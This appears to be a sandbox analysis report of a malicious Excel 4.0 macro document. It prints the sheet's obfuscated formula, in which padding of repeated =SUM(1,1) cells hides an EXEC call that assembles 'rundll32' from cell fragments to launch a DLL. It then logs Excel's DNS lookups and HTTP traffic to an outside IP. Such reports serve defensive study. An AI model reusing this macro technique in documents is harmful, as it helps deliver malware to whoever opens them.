,,l,,l,..\GVer.iks,3"=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=EXEC(""rund""&G12&G13&G14&G15&"" ""&F14&"",StartW"")",,2,,=RETURN(),,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 11, 2021 00:16:55.747047901 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.775840044 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.775976896 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.776480913 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.805140018 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828572035 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828622103 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828656912 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828701019 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.828766108 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.828777075 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:18:42.739722013 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:18:42.768620968 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:18:42.768901110 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 11, 2021 00:16:41.630199909 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:41.642940044 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:43.169007063 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:43.183543921 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:43.817776918 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:43.830389977 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:44.512424946 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:44.526330948 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:45.245145082 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:45.258902073 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:46.207685947 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:46.220434904 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:51.013355970 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:51.026460886 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:51.796119928 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:51.808504105 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:52.776112080 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:52.822726011 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:52.871478081 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:52.884902954 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:53.131850004 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:53.145723104 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:54.134819031 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:54.147749901 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:55.155042887 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:55.167969942 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:55.704058886 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:55.743108034 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:55.909338951 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:55.922063112 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:56.774822950 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:56.788069010 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:57.160152912 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:57.172883987 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:57.506046057 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:57.518795013 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:58.276417971 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:58.289179087 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:59.815046072 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:59.827958107 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:01.117827892 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:01.131715059 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:01.167803049 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:01.181021929 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:02.103447914 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:02.116221905 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:04.066437960 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:04.079101086 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:08.813133955 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:08.825639963 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:12.113722086 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:12.131546021 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:19.082400084 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:19.134360075 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:43.563807011 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:43.575984001 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:46.275264978 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:46.293052912 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:18:17.996232033 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:18:18.009129047 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:18:26.311083078 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:18:26.337780952 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:18:27.152786016 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:18:27.171003103 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:19:00.756851912 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:19:00.769555092 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:19:00.947961092 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:19:00.961838007 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 11, 2021 00:16:55.704058886 CEST | 192.168.2.3 | 8.8.8.8 | 0x50ed | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 11, 2021 00:16:55.743108034 CEST | 8.8.8.8 | 192.168.2.3 | 0x50ed | No error (0) | 172.67.189.4 | A (IP address) | IN (0x0001) | ||
Apr 11, 2021 00:16:55.743108034 CEST | 8.8.8.8 | 192.168.2.3 | 0x50ed | No error (0) | 104.21.43.238 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49713 | 172.67.189.4 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 11, 2021 00:16:55.776480913 CEST | 345 | OUT | |
Apr 11, 2021 00:16:55.828572035 CEST | 346 | IN |